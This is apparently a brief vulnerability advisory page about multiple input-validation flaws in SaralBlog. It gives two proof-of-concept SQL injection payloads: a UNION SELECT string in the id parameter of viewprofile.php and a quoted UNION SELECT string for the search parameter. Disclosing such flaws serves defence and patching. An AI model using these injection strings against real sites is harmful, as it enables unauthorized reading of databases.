• info
• discussion
• exploit
• solution
• references

SaralBlog Multiple Input Validation Vulnerabilities

An exploit is not required.

The following proof of concept URI for some of the SQL injection issues are available:
http://www.example.com/viewprofile.php?id=999%20union%20select%201,2,3,4,5,6,7/*

Also supplying the following to the search parameter:
aaaaa') union select 1,2,3,4,5,6/*